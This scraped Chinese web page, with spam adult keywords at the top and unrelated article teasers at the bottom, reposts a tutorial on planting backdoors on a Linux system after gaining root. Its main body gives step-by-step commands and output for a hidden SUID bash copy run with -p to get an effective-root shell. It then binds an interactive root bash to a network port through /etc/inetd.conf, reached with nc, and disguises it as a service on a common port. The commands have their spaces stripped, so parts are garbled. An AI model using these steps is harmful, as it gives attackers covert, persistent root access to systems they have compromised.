国产chinesehd精品酒店,邱淑贞aa极毛片,国产在线色视频,玖玖爱zh综合伊人久久

CentOS小心被suid centos被攻擊

更新時間:2023-09-05 00:18:17作者:未知

CentOS小心被suid centos被攻擊

  CentOS小心被suid shell與inetd后門利用的詳細講解

你現(xiàn)在已經(jīng)是root用戶,想留一個后門。 CentOS小心被suid shell與inetd后門利用的詳細講解

  系統(tǒng)環(huán)境:

  dawg:~#uname-a

  Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

  1.SUIDshell

  首先,先切換成為root用戶,并執(zhí)行以下的命令:

  dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

  當然,你也可以起其他更具備隱藏性的名字,我想猥瑣并機智的你,肯定能想出很多好的名字的。文件前面的那一點也不是必要的,只是為了隱藏文件(在文件名的最前面加上“.”,就可以在任意文件目錄下進行隱藏).

  現(xiàn)在,做為一個普通用戶,我們來啟用這個后門:

  fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

  為什么不行呢?

  因為bash2針對suid有一些護衛(wèi)的措施.但這也不是不可破的:

  .woot-2.05b$/.woot-p

  .woot-2.05b#id

  uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

  使用-p參數(shù)來獲取一個rootshell.這個euid的意思是effectiveuserid(關于這些ID的知識,可以戳這里)

  這里要特別注意的是,作為一個普通用戶執(zhí)行這個SUIDshell時,一定要使用全路徑。

  小知識:

  如何查找那些具有SUID的文件:

  dawg:~#find/-perm+4000-ls

  這時就會返回具有SUID位的文件啦。

  2.遠程后門:利用/etc/inetd.conf

  我們使用vi來修改/etc/inetd.conf文件

  原文件:

  #chargendgramudpwaitrootinternal

  #discardstreamtcpnowaitrootinternal

  #discarddgramudpwaitrootinternal

  #daytimestreamtcpnowaitrootinternal

  修改為:

  #discardstreamtcpnowaitrootinternal

  #discarddgramudpwaitrootinternal

  daytimestreamtcpnowaitroot/bin/bashbash-i

  開啟inetd:

  dawg:~#inetd

  如果要強制重啟inetd:

  dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

  現(xiàn)在我們就可以用nc來爆菊了:

  C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

  (UNKNOWN)[192.168.1.77]13(daytime)open

  bash:nojobcontrolinthisshell

  bash-2.05b#bash-2.05b#

  bash-2.05b#iduid=0(root)

  gid=0(root)groups=0(root)bash-2.05b#uname-a

  Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

  小貼士:

  我們可以修改/etc/services文件,加入以下的東西:

  woot6666/tcp#evilbackdoorservice

  然后修改/etc/inetd.conf:

  wootstreamtcpnowaitroot/bin/bashbash-i

  我們可以修改成一些常見的端口,以實現(xiàn)隱藏。

本文標簽: 后門  文件  我們可以  

為您推薦

CentOS小心被suid centos被攻擊

CentOS小心被suid shell與inetd后門利用的詳細講解 CentOS小心被suid shell與inetd后門利用的詳細講解 你現(xiàn)在已經(jīng)是root

2023-09-05 00:18

CentOS下查看某個進程的線程數(shù)量的方法

CentOS下查看某個進程的線程數(shù)量的方法 有些時候需要確實進程內(nèi)部當前運行著多少線程,那么以下幾個方法值得一用. 1.根據(jù)進程號進行查詢: # pstree

2023-09-05 00:17

特價電影票9.9哪里買(特價電影票怎么買)

特價電影票9.9哪里買,特價電影票9塊9的票在團購網(wǎng)上買,具體方法如下:1、在團購網(wǎng)購買,比如大眾點評、媒體、淘票票等平臺上,會出售一些冷門場次的特價票。2、除了這個途徑外,還可以關注一些商家的活動

2023-09-05 00:06

魅族搜索通知怎么關閉(魅族搜索通知怎么關閉提醒)

魅族搜索通知怎么關閉,魅族搜索通知關閉的方法如下:1、首先點擊打開手機的設置,點擊設置中的“通知和狀況欄”。2、其次點擊進入“通知智能管理”。3、接著在眾多軟件中找到“搜索”,點擊進入。

2023-09-05 00:06

監(jiān)控怎么調(diào)試出畫面(監(jiān)控怎么調(diào)試出畫面模式)

監(jiān)控怎么調(diào)試出畫面,以電腦為例,調(diào)試出監(jiān)控畫面的步驟為:1、首先確保錄像機與電腦同在一個網(wǎng)段內(nèi)。2、然后在瀏覽器中輸入監(jiān)控錄像機上的IP地址,即可調(diào)試出監(jiān)控畫面。

2023-09-05 00:05

小度在家可以投屏嗎 小度在家可以投屏嗎怎么設置

小度在家可以投屏嗎,小度在家是可以投屏到電視的,但是,并不是小度在家里的所有功能都可以投屏到電視的,因此在投屏的時候還是需要注意的。

2023-09-05 00:05